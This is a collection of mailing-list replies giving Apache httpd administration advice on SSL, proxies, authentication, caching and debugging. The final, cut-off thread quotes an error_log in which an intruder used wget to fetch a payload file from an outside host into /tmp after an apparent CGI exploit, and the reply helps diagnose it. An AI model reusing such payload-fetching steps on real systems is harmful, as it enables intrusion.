Re: [us...@httpd] Re: httpd is creating large number of shared memory segments.

[Scott Gifford]

"Chandranshu ."  writes:

> We changed our script that used to do a graceful restart to also
> record the number of shared memory segments before and after the
> restart. Plotting the number of shm segments vs. the number of times
> the server was restarted gracefully was almost a straight line.

Hello Chandranshu,

When you do a graceful server restart, Apache asks the children to
exit when it's convenient and starts up new children.  So it would not
surprise me to see a short spike in resource consumption until the old
child processes complete.  It would surprise me if it didn't return to
normal after a few minutes, though, and you're seeing the increased
shared memory segments until a server restart, right?  And you suspect
it's a leak somewhere?

A strategy for figuring out what's causing this would be to start off
with a minimal Apache configuration.  You could create a new conf file
with all modules disabled listening on another port and look for the
leak there.  If you still see it, it must be in the Apache core;
otherwise it's in a module.  Keep enabling modules until you start
seeing it, then you know what module it is (you can also enable and
disable groups of modules to do a sort of binary search).  If with the
same set of modules as your production server you still don't see a
leak, it must be some code running under your server, and you can use
the same sort of process to bring in different pieces of code until
you see the leak.

Hope this helps, and good luck!

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Need some SSL help please.

[Scott Gifford]

Josh Gooding  writes:

[...]

> Run the Login.jsp through SSL, after successful login, drop the SSL.  The
> entire session doesn't need encrypted, only the login and password.  

Sure, that's possible.  The general strategy is to accept the username
and password on a secure connection, and if they are correct generate
a session ID which can be used for future authentication.  You can
return this to the browser in a form or the URL (maybe in a cookie,
not sure if cookies can be passed between HTTP and HTTPS sites), and
the non-encrypted part of your application would just check that the
session ID is valid.

I don't know of an Apache module that will do this for you, and I
don't know anything about Tomcat, but at a high level that's a common
approach.

Hope this helps,

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

[us...@httpd] Different Limit rules on the same directory with mod_ftp

[Scott Gifford]

Hello,

I'm using mod_ftp to provide authenticated FTP access to a Web
directory.  It is mostly read-only, but a few users should have write
access to the directory.  I am using mod_auth_mysql with groups for
authentication; there is a reader group and a writer group, and the
user with write access is in both groups.

Everything works OK if I just provide read access or write access, but
when I try to provide one group for write access and another for read
access, it ends up providing both groups with read-write access.  My
rules look like this:

  
  Include mysql_auth.conf

  require group writer


  Include idx_auth.conf
  require group reader

  

I am not really sure how to troubleshoot this.

Does anybody have a similar configuration working, or any other
advice?

Thanks!

---Scott.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Different Limit rules on the same directory with mod_ftp

[Scott Gifford]

Nick Kew  writes:

> Scott Gifford wrote:
>> Hello,
>> I'm using mod_ftp to provide authenticated FTP access to a Web
>> directory.  It is mostly read-only, but a few users should have write
>> access to the directory.  I am using mod_auth_mysql with groups for
>
> What mod_auth_mysql?
>
> There are several third-party modules with that name.  

I am using the Debian package libapache2-mod-auth-mysql, which is
targeted to Apache 2.2.  The package is for version 4.3.9-11, and it
includes mod_auth_mysql.so and has a copyright of:

* Copyright (c) 2001 by J. R. Westmoreland 
* Portions Copyright (c) 2002-2004 by Matthew Palmer 

> They are essentially obsoleted by the DBD framework in HTTPD/2.2.
> So you are probably using a module written for the HTTPD/2.0 authnz
> framework rather than the 2.2 one.

I could switch to the DBD framework if that is likely to help with the
problem at hand.  I used this mod_auth_mysql module because it was
readily available in Debian and I was able to find some example code
and get it working quickly, but am otherwise not attached to it.

>>   
>>   Include mysql_auth.conf
>> 
>>   require group writer
>> 
>> 
>>   Include idx_auth.conf
>>   require group reader
>> 
>>   
>
> What's in those Includes?   is not a general-purpose
> container, so it may not work as you expect on some or all
> of the contents of idx_auth.conf.

There is really only one file, I made an error cleaning up my email
message and changed the name in one place but not the other.  It is
basically configuration options for mod_auth_mysql.  I have tried
including it only in the containing  element, in both
 elements, and in just the second  element.  Here are
the contents, with passwords elided:

# Disable other auth modules
AuthBasicAuthoritative Off
AuthUserFile /dev/null

# Configure Auth_MySQL
Auth_MySQL on
Auth_MySQL_Host localhost
Auth_MySQL_User apache_auth
Auth_MySQL_Password xxx
Auth_MySQL_DB idx_users
Auth_MySQL_Password xxx
Auth_MySQL_Group_Table users
Auth_MySQL_Username_Field user
Auth_MySQL_Password xxx
Auth_MySQL_Group_Field groups
Auth_MySQL_Encryption_Types Crypt
Auth_MySQL_Empty_Password xxx
Auth_MySQL_Authoritative on

AuthName "My Auth"
AuthType basic

What would be really useful is some hints for troubleshooting this.  I
can't tell if mod_ftp is misbehaving, or mod_auth_mysql, or Apache, or
if everything is behaving as designed and I just misunderstand what
it's doing.  I can't figure out a way to nail it down so I can take a
closer look at just one part.

Thanks for any advice!

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] equivalent of http://httpd.apache.org/docs/1.3/misc/howto.html#logreset

[Scott Gifford]

Shibi NS  writes:

> Is there any equivalent of http://httpd.apache.org/docs/1.3/misc/howto.html#
> logreset in apache 2.X

The information there still applies, although "apachectl graceful" or
"apache2ctl graceful" is preferred over kill -1 `cat httpd.pid`
nowadays.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Getting HTTP Headers from CGI program

[Scott Gifford]

André Warnier  writes:

> Tushar Joshi wrote:
>> Hi thanks for the reply. I'm writing my applications in C so would
>> have thought there might be a low level way of doing this.

[...]

> But, in general, if this is a CGI program, then it is running as a
> separate process from Apache itself, and it does not have access to
> Apache internals.
> What your program gets is the CGI environment as set up by Apache, but
> you do not get all the HTTP request headers that way (only some are
> "translated" by Apache as environment variables for your CGI
> program).

It would be fairly straightforward to copy additional information from
Apache to the environment with a little bit of mod_perl or a simple
module, to make it available to CGI scripts.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Apache vs LiteSpeed

[Scott Gifford]

On Wed, Jan 13, 2010 at 1:31 AM, Jarrod Slick wrote:

> Apache Users,
>
> As some of you may or may not know a fairly prominent commercial webserver,
> LiteSpeed, claims to outperform even a well configured Apache 2.2.x
> installation by orders of magnitude.  They have some internal benchmarks
> that appear to back this up, but, being a natural skeptic, I wanted to test
> it out for myself.  So I've agreed to pit Apache and LiteSpeed (as well as a
> few other webservers) against one another in benchmarking tests on a 2x Xeon
> 5520 machine.  I, and hopefully others, will be configuring Apache.
>  LiteSpeed will be configuring their product.
>

What is the workload you are benchmarking?  Static pages, PHP/mod_perl code,
CGI, etc.?  Is the client a benchmark tool or a browser, and where on the
network is it relative to the server?  How are you measuring performance
(page load times, requests/second, etc.)?

-Scott.

Re: [us...@httpd] Apache vs LiteSpeed

[Scott Gifford]

On Wed, Jan 13, 2010 at 2:08 AM, Jarrod Slick wrote:

>
> On Jan 13, 2010, at 12:47 AM, Scott Gifford wrote:
>
> On Wed, Jan 13, 2010 at 1:31 AM, Jarrod Slick wrote:
>
>> Apache Users,
>>
>> As some of you may or may not know a fairly prominent commercial
>> webserver, LiteSpeed, claims to outperform even a well configured Apache
>> 2.2.x installation by orders of magnitude.  They have some internal
>> benchmarks that appear to back this up, but, being a natural skeptic, I
>> wanted to test it out for myself.  So I've agreed to pit Apache and
>> LiteSpeed (as well as a few other webservers) against one another in
>> benchmarking tests on a 2x Xeon 5520 machine.  I, and hopefully others, will
>> be configuring Apache.  LiteSpeed will be configuring their product.
>>
>
> What is the workload you are benchmarking?  Static pages, PHP/mod_perl
> code, CGI, etc.?  Is the client a benchmark tool or a browser, and where on
> the network is it relative to the server?  How are you measuring performance
> (page load times, requests/second, etc.)?
>
> -Scott.
>
>
> Scott,
>
> I'm open to suggestions on all fronts, but as it stands we were going to do
> the following with the ab tool:
>
> -small static pages test
> -large static pages test
> -hello world php test
>
> And we were going to also benchmark a wordpress/joomla site in a more
> "real-world" load simulation test using the tool "siege".
>

For smaller static content that will be fetched multiple times without
changing, consider mod_mem_cache, which will avoid most disk I/O for that
content.  For larger content or content that will just be fetched once or
change frequently, consider enabling sendfile or mmap for sending it.  For
PHP, use a PHP accelerator, such as eAccelerator, APC, or Zend.  For larger
applications, do your best to configure the different components
appropriately, for example with Drupal configure the static Javascript and
CSS files to be cached with mod_mem_cache, use the PHP accelerator for the
code, and if you have any large files make sure you have sendfile or mmap
available.  If the benchmark client will do any caching, make sure
expiration is configured to allow a long cache time.  Disable .htaccess
unless you need it, so Apache doesn't have to look for it.

Do a dry run while running top and iostat to see where your bottleneck is.
 Try running Apache under strace to see what it's doing at each request, and
get it doing as little as possible.  If it is serving a file from the memory
cache or with a static mmap, strace should show it making practically no
system calls.

If you google around for Apache benchmark tuning I'm sure you'll find some
other ideas and examples.

Good luck!

Scott.

Re: [us...@httpd] Apache vs LiteSpeed

[Scott Gifford]

On Fri, Jan 15, 2010 at 12:08 PM, Jarrod Slick wrote:
[ ... ]

> And another question: how would you do it differently?  Sure, in an ideal
> world I could assemble my own botnet and then blast my corporate network
> with a gigabit of distributed traffic multiple times for each webserver --
> but obviously in the real world that's not going to happen.


IMO it's not necessary to simulate different connections from all over the
world, but it is true that the benchmark client will consume a substantial
amount of resources, which will affect your result.  Both should be skewed
about the same, so it should be a fair comparison, but things like
"requests/sec" will not be meaningful.

Using the live Internet may cause your network connection to be the
bottleneck, too, which could give bad results.

I think using a LAN/VLAN connection would be a fair measure.  You could also
consider running the tests as instances on Amazon EC2, which will let you
lease a small pool of servers for a few hours for $20 or so.

---Scott.

Re: [us...@httpd] can we run two SSL domains on one IP

[Scott Gifford]

On Tue, Jan 19, 2010 at 6:55 AM, Nilesh Govindarajan wrote:

>
> Oops. My bad. SSL protocol doesn't give the Host: header. So apache can't
> decide which Vhost to serve (from apache docs :D).
>

Though SSL doesn't itself provide a Host: header, the HTTP session on top if
it still does, so if you can get past the SSL layer virtual hosting will
work as usual.  As others have suggested, wildcard certs and
"subjectAltName" certs are two ways to make the SSL layer accept multiple
certs.  I have successfully used wildcard certs and name-based virtual
hosting together.

-Scott.

Re: [us...@httpd] observed delay for changing process owner

[Scott Gifford]

On Mon, Feb 15, 2010 at 10:43 AM, Harald Falkenberg <
harald.falkenb...@desy.de> wrote:
[ ... ]

> Now I observed, that it takes a long time to change the onwership of the
> processes, which I set via the 'user' and 'grou' derictives in httpd.conf.
> After the ownership changed, the processes serve immediately the requests.
>

I am not sure how you have observed this, but my suspiction is you are
observing a side-effect of the delay, not the cause of the delay itself.
 One possibility is that your configuration requires a large number of DNS
resolutions; others have suggested other possibilities.

Apart from educated guessing, I unfortunately don't know of a better way to
debug this than to comment out parts of the configuration to see what is
causing the delay.  I suspect if you start with a minimal configuration you
will find that the process user and group are changed very quickly.


> Did anybody observe something simular and has an idea what might cause this
> long delay in changing the ownership? Is it possible to to debug the startup
> phase of the apache, to see were the processes spend their time?
>

A tool to debug this would be extremely useful, but unfortunately I'm not
aware of any.

-Scott.

Re: [us...@httpd] Can I have 2 httpd servers running on 2 different ports?

[Scott Gifford]

On Mon, Feb 22, 2010 at 2:09 PM, Aruna Gummalla wrote:

> Hi,
>
> Can I have 2 httpd servers running on 2 different ports?
>

Sure.  You'll want to create a new configuration file and start Apache using
that configuration file.  You can run Apache by hand, or you can copy
apache2ctl and change the settings in there, then run your copy.

That's a bit vague, I know, but I hope it will get you started.  You may
find there's an easier answer if you don't really need two Apache servers,
but can get by with one of the other suggestions from this thread.

-Scott.

Re: [EMAIL PROTECTED] way for me to turn off if-modified-since & always return 304 reply ?

[Scott Gifford]

"dave selby" <[EMAIL PROTECTED]> writes:

> Is there a way for me to turn off if-modified-since so the client
> browser will ALWAYS use its locally cached document

Dave,

Usually sending an Expires header will tell browsers to mostly use a
cached version.  I use something like this to set my expires time to
quite a bit in the future:

   
  ExpiresActive On
  ExpiresDefault A8640
   

This is part of mod_expires:

http://httpd.apache.org/docs/2.0/mod/mod_expires.html

Also, it would really surprise me if Apache used the parent directory
in deciding about IMS requests.  You might want to do some simple
experiments to verify this is what it's doing.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: X-Forwarded-For

[Scott Gifford]

"Mohit Anchlia"  writes:

> Our traffic is going through proxy, how can I enable X-Forwarded-For
> in apache to get the original IP. Does this also work for users using
> ISP (private IP) and are behind the ISP router.

Do you mean you have Apache acting as a proxy and you want it to send
the X-Forwarded-For header, or you have another proxy server and you
want Apache to do something with the information in its
X-Forwarded-For header?

Apache should generally send this information properly on its own,
see:

http://httpd.apache.org/docs/trunk/mod/mod_proxy.html

The easiest way to handle the headers in in the application side.
ISPs may use proxies, too, so if you only want special treatment for
requests from your own proxy, you should check the IP address of the
connection, and if it's your proxy use the information from the last
X-Forwarded-For header, which should always be the one it added (you
can also use the Via header).  For an example in PHP see:

http://devcentral.f5.com/weblogs/macvittie/archive/2008/06/02/3323.aspx

That's how I've always done it, but there are some modules that claim
to do some of this work for you so you could avoid changing your Web
apps:

http://www.cotds.org/mod_extract_forwarded2/

http://search.cpan.org/~jvanasco/Apache2-xForwardedFor-0.04/lib/Apache2/xForwardedFor.pm

I haven't used either, and there may be others.

Good luck!

Scott.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] 'safe' way dismount a usb drive?

[Scott Gifford]

Foo JH  writes:

> I've managed to mount/ umount a usb drive. But I'm not sure if there is
> any other commands I need to execute - as a best practice - before I
> physically plug it out.

Not sure what this has to do with Apache; are you serving Web files
from the USB drive?

At any rate, unmounting the drive should do everything necessary to
prepare it for removal.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Lags on simple static file requests

[Scott Gifford]

"Paul Prescod"  writes:

> I grep my logs every day for slow queries. Sometimes I see a dynamic
> request in there and I go and optimize the code. But more concerning
> is when I see simple serving of very small static files on a very
> underloaded machine. I am looking for hints about the source.

Hi Paul,

I have noticed these lines in my logs occasionally, too.  I have
always chalked them up to slow clients, or clients who fall off the
network after sending the request.

I don't know the details of exactly how Apache calculates this time,
though.  Perhaps somebody more familiar with the internals of Apache
can provide some details.

-Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Redirecting request from HTTP to HTTPS

[Scott Gifford]

"Tarun Narang"  writes:

> How could I redirect all my requests for http to https ?

Hello Tarun,

We use RedirectMatch for this.  See:

http://httpd.apache.org/docs/2.0/mod/mod_alias.html#redirectmatch

> However, I have to redirect the non SSL request to SSL request, like when the
> user requests for http://localhost:8080/hsbc it should be redirected to

Try something like this:

RedirectMatch ^/hsbc(.*)$ https://localhost:4430/hsbc$1

I hope this helps, I'm not sure I understood exactly what you were
asking in your message.

Good luck!

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [EMAIL PROTECTED] HTTP AUTH

[Scott Gifford]

Christopher Deeley <[EMAIL PROTECTED]> writes:

> I would like to set up a user folder for each user on my site and
> the only method I know to stop anyone but the user accessing that
> folder is to use htaccess to require the valid user. I have PHP
> running as a module on Apache.  Is there a way to pass username &
> password from a form to a php script which will set the values of
> $_SERVER['HTTP_AUTH_USER'] and $_SERVER['HTTP_AUTH_PW'] ? I
> currently have a page which does the usual pop-up login box thingy
> so these values are set automatic but I would like to get rid of it.

No, you have to use cookies if you want a Web form instead of the
standard popup.  You can use mod_perl and Apache::AuthCookie to do
this without writing much code.

> Also if there a way to logout?

It's client-specific; Firefox provides a way to logout, IE does not.

> I used to use sessions to validate the user and restrict access to
> pages but I found people could still access pictures. Is there a way
> to use a form based login (like I did before with sessions) and
> still restrict access to a folder by only allowing one user in?

I would also look into using Apache::AuthCookie to do this.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Can apache and ssh share port 80?

[Scott Gifford]

[EMAIL PROTECTED] writes:

[...]

> Ideally, I wish there were some kind of apache directives I could use
> so that httpd would continue to monitor port 80, and if it gets a
> connection that does not look like http or https, it would forward the
> bits to port 22.  But I doubt that is possible.

The easiest way to do this is set up another IP address on the
machine, and have ssh listen on port 80 of that address only.

---Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Using apache as proxy only on specific folder

[Scott Gifford]

[EMAIL PROTECTED] writes:

> Hi all.
>
> I want to make apache2 (port 80) to work like a proxyserver to a other 
> webserver that is running on the same machine on port 3000.
>
> The following works perfectly for this: 
> ProxyPass / http://localhost:3000/
> ProxyPassReverse / http://localhost:3000/
>
> But what I want is that apache only send the user to this other webserver 
> when the user hits a specific folder, like
> http://10.0.0.1/otherwebserver
>
> Is this posible in apache2 (2.2.3-4)?

mod_rewrite can do this.  See the [P] "force proxy" flag.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Overriding url filename changing in Apache

[Scott Gifford]

"Harry Spier" <[EMAIL PROTECTED]> writes:

> I have a website on a shared hosting Apache Linux server.

[...]

> I believe (but I'm not sure) that [...] mod-speling is enabled on
> that Apache server. This is the default behaviior on the shared
> hosting server and they wont change it.
>
> I need to override that behavior in my domain so that a url to a
> non-existent file will always give a 404 error [...] Is there anyway I can
> use my .htaccess file to override the servers changing the url

According to the docs, you can use the directive:

CheckSpelling off

in your .htaccess file to turn off mod_speling for just the files in
that directory:

http://httpd.apache.org/docs/2.0/mod/mod_speling.html

Hope this helps!

---Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Is mod_ssl enough to authenticate?

[Scott Gifford]

"Naveen Rawat" <[EMAIL PROTECTED]> writes:

>  
>
> Hi All,
>
>  
>
> I want to authenticate modules(certificate based) against each other before 
> any
> communcation takes place among .Modules may reside on local and remote 
> servers.
> In both cases,Is mod_ssl enough for authentication or I have to implement the
> authentication functionality in each module seperately ?
>
> I want to know , if mod_ssl will authenticate other modules from remote /local
> host or it authenticate clients only. ?

Yes, you can do this with mod_ssl.  See SSLVerifyClient to require
that a recognized certificate be used by the client, and
SSLCACertificateFile to list the CA's whose signatures you recognize.
You can create a CA, put that CA's certificate in there, and then sign
the client certificates (you'll probably want to look at
SSLCARevocationFile, too, to be able to revoke access to clients).
I've done that; you can probably also put all of the individual client
certificates in there.  Docs are here:

http://www.modssl.org/docs/2.8/ssl_reference.html

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Resource temporarily unavailable:,setuid: unable to change to uid: 502

[Scott Gifford]

kazekun <[EMAIL PROTECTED]> writes:

> Hello,
>
> I'm new to linux and had installed apache 2.2.6 on Fedora 7 about
> a month ago.  It seems to be working fine (still able to access the
> website) except that when I check the error log today (Sept. 27), I
> notice that there are some error messages
>
> [Wed Sep 26 13:13:38 2007] [alert] (11)Resource temporarily unavailable:
> setuid: unable to change to uid: 502

"Resource temporarily unavailable" is Unix error EAGAIN.  Here's what
the manpage for setuid(2) says on my system:

ERRORS
   EAGAIN The uid does not match the current uid and uid brings
   process over it's NPROC rlimit.

Hopefully that will get you pointed in the right direction.

[...]

> Then whenever the website is accessed, it gives the following message:
>
> [Wed Sep 26 13:13:45 2007] [error] [client 203.168.204.205] (22)Invalid
> argument: apr_global_mutex_lock(rewrite_log_lock) failed
> [Wed Sep 26 13:13:45 2007] [error] [client 203.168.204.205] (22)Invalid
> argument: apr_global_mutex_unlock(rewrite_log_lock) failed

That could be caused by the above error; if setuid fails it might not
have permission to grab that mutex.

Good luck!

---Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [users@httpd] mod_rewrite: Overwriting REMOTE_ADDR with HTTP_X_FORWARDED_FOR

[Scott Gifford]

Werner Schalk <[EMAIL PROTECTED]> writes:

> Hi,
>
> well apologies for bringing this issue up again but none of the suggested 
> solutions actually does work. I tried the following output filter:

Why do you need to solve it exactly this way?  Can't you instruct your
code or your Apache to simply consult HTTP_X_FORWARDED_FOR instead of
or in addition to REMOTE_ADDR?

It looks like your application is in PHP.  Can't you simply set the
environment variables how you want them when your code starts running,
perhaps using a library if you need to do it many places?

ScottG.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [users@httpd] mod_rewrite: Overwriting REMOTE_ADDR with HTTP_X_FORWARDED_FOR

[Scott Gifford]

Werner Schalk <[EMAIL PROTECTED]> writes:

> Hi,
>
> well of course I could use HTTP_X_FORWARDED_FOR instead of REMOTE_ADDR in all 
> my scripts but the problem is that I have some customers and their scripts 
> are relying on REMOTE_ADDR so I don't want to ask them to change their 
> scripts...

Ah.  Is everything you're concerned about written in PHP?  If so,
perhaps PHP has some mechanism for running a bit of code before each
PHP file is loaded; I believe this is possible with mod_perl, for
example.  Maybe the PHP folks would have some useful ideas.

Otherwise it sounds like you're stuck writing a small Apache module,
or hiring somebody to write one for you.  Sounds like a hassle, but at
least a moderately interesting hassle.  :)

ScottG.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [users@httpd] Chroot question.

[Scott Gifford]

"Gold, Samuel (Contractor)" <[EMAIL PROTECTED]> writes:

> Hey all,
>
> I have setup apache 1.3.33 on Solaris 9 in a chroot environment and just
> wanted to ask a simple question.  If there is a /proc directory in the jail
> should the apache processes be in the real root /proc directory or in the
> jail /proc directory.  This is the first time I have ever setup a chroot
> jail so I just want to be sure.  Sorry if this OT.

I wouldn't give your chroot'd Apache access to the real /proc unless
something required it.  If possible, I would just not put a /proc at
all.

ScottG.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Capturing IP.

[Scott Gifford]

Luis Croker <[EMAIL PROTECTED]> writes:

> I have an Apache web server (server-A) which Im using like a proxy with
> SSL, I mean...  I receive all connections and forward them to another  server
> (server-B). Everything  works fine. Now, we want to capture the source IP
> address of the connections on the server B

Use Via:

http://httpd.apache.org/docs/1.3/mod/mod_proxy.html#proxyvia

ScottG.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Multiple SSL servers behind one public ip

[Scott Gifford]

"Dan Carl" <[EMAIL PROTECTED]> writes:

[...]

> The way I understand it is that because of the nature of the SSL protocol
> you can only have one ssl site per IP.
> Is there no way around this?

You can run the two SSL servers on two different ports, then use a URL
like:

https://example.com:444/...

to refer to the server using the non-standard port.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] how to run a root programme from apache server

[Scott Gifford]

Arun Naik <[EMAIL PROTECTED]> writes:

> Hi,
> I have to run a program from apache server, whose owner is root. As apache
> server runs from user apache, it is not able to run the program ( owned by
> root). Is there any way out ?

Change the permissions on the file so Apache has permission to run it,
or make a copy with different permissions if you don't have control
over the original file.

If the program needs to run *as* root, it would need to be setuid,
which is very dangerous if not done with extraordinary care.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] how to run a root programme from apache server

[Scott Gifford]

Anatoly Pugachev <[EMAIL PROTECTED]> writes:

> On Thu, Sep 01, 2005 at 11:02:31AM -0400, Scott Gifford wrote:
> | Arun Naik <[EMAIL PROTECTED]> writes:
> | 
> | > Hi,
> | > I have to run a program from apache server, whose owner is root. As apache
> | > server runs from user apache, it is not able to run the program ( owned by
> | > root). Is there any way out ?
> | 
> | If the program needs to run *as* root, it would need to be setuid,
> | which is very dangerous if not done with extraordinary care.
>
> or you can try to use sudo with apache user set to NOPASSWD in
> sudoers and allowing to run only this command. default sudoers file
> have examples on this.

This is still very dangerous if not done with extraordinary care.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Different security based on network interface

[Scott Gifford]

"AragonX" <[EMAIL PROTECTED]> writes:

[...]

> I know that mod_access and I think mod_security will allow me to do this
> but they do it based on IP address.  I'm afraid someone will spoof the IP
> addresses of the internal network to bypass this security measure.

The easiest way to do this is with a firewall.  Set up a firewall on
your external interface that blocks all packets claiming to be from
your internal interface.  Your OS should have a tool to do this
(iptables on modern Linux).  It's also smart to do this at your
perimeter router; since lots of random things use IP addresses as
access control it's wise to stop anything fishy before it gets into
your building.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] unwanted file upload

[Scott Gifford]

John Hammer <[EMAIL PROTECTED]> writes:

> I am relatively new to this so if this is not the correct forum I would 
> appreciate being pointed to the right place.
>
> Over the weekend I discovered an unwanted program running on my server. In 
> the error_log I found this entry:
>
>> --13:29:54--  http://www.ozdereklam.com/.xpl/dc.txt
>>=> `/tmp/dc.txt'
>> Resolving www.ozdereklam.com... 82.222.180.120
>> Connecting to www.ozdereklam.com[82.222.180.120]:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 943 [text/plain]
>> 
>> 0K   100%4.62 
>> KB/s
>> 
>> 13:29:55 (4.62 KB/s) - `/tmp/dc.txt' saved [943/943]
>> 
>
> Is this a problem that can be solved with Apache? How can I keep files from 
> being uploaded in this way (and I am not sure what that "way" is).

My best guess is that somebody has exploited a bug in one of your CGI
scripts in a way that allowed them to execute arbitrary code, and they
elected to have this arbitrary code download this dc.txt file, using
wget it looks like.  The solution is to find and fix your buggy CGI
program(s), or to disable executable content from Apache.

If you look in your access_log around the time of that error_log
entry, you can probably narrow down which programs might be allowing
this.

mod_security is supposed to be able to protect against some of these
attacks:

